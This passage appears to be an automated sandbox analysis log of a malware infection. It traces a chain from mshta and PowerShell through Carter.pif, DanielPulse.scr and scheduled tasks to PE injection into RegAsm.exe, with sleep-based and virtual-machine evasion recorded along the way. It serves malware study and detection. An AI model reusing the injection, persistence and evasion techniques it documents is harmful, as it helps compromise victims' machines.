              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeMemory allocated: 1330000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeMemory allocated: 30A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeMemory allocated: 2EA0000 memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3928Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4872Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2689Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 470Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6256
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3394
              Source: C:\Windows\SysWOW64\timeout.exeWindow / User API: threadDelayed 726
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifWindow / User API: threadDelayed 3117
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeWindow / User API: threadDelayed 1144
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeWindow / User API: threadDelayed 8699
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifAPI coverage: 5.0 %
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrAPI coverage: 4.9 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264Thread sleep count: 3928 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep count: 4872 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7364Thread sleep time: -21213755684765971s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1996Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4040Thread sleep count: 2689 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep count: 470 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4152Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4936Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1736Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5040Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8468Thread sleep count: 6256 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8472Thread sleep count: 3394 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8500Thread sleep time: -10145709240540247s >= -30000s
              Source: C:\Windows\SysWOW64\timeout.exe TID: 8908Thread sleep count: 726 > 30
              Source: C:\Windows\SysWOW64\timeout.exe TID: 8908Thread sleep time: -72600s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif TID: 9128Thread sleep count: 3117 > 30
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif TID: 9128Thread sleep time: -31170s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 8752Thread sleep time: -60000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 8784Thread sleep time: -24903104499507879s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 7700Thread sleep count: 1144 > 30
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 7700Thread sleep count: 8699 > 30
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifThread sleep count: Count: 3117 delay: -10
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_004062D5 FindFirstFileW,FindClose,14_2_004062D5
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_00402E18 FindFirstFileW,14_2_00402E18
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_00406C9B
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_002D4005
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D494A GetFileAttributesW,FindFirstFileW,FindClose,29_2_002D494A
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_002D3CE2
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,29_2_002DC2FF
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002DCD14 FindFirstFileW,FindClose,29_2_002DCD14
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,29_2_002DCD9F
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_002DF5D8
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_002DF735
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,29_2_002DFA36
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,37_2_00944005
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0094C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,37_2_0094C2FF
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose,37_2_0094494A
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,37_2_0094CD9F
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0094CD14 FindFirstFileW,FindClose,37_2_0094CD14
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,37_2_0094F5D8
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,37_2_0094F735
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0094FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,37_2_0094FA36
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,37_2_00943CE2
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_00285D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,29_2_00285D13
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeThread delayed: delay time: 60000
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\msword\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\mswordJump to behavior
              Source: msword.exe, 0000000E.00000002.1969463085.000000000054D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: mshta.exe, 00000000.00000003.1904929361.000000000A735000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1917190543.000000000A735000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1904929361.000000000A701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1919817498.000000000A735000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1915262349.000000000A735000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1919753403.000000000A703000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1914069158.000000000A735000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Carter.pif, 0000001D.00000002.3852527284.0000000001037000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851904482.00000000014A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002E45D5 BlockInput,29_2_002E45D5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_00285240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,29_2_00285240
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002A5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,29_2_002A5CAC
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,14_2_004062FC
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002C88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,29_2_002C88CD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0029A354 SetUnhandledExceptionFilter,29_2_0029A354
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_0029A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_0029A385
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0090A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_0090A385
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0090A354 SetUnhandledExceptionFilter,37_2_0090A354
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifMemory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: D50000 value starts with: 4D5A
              Writes to foreign memory regions
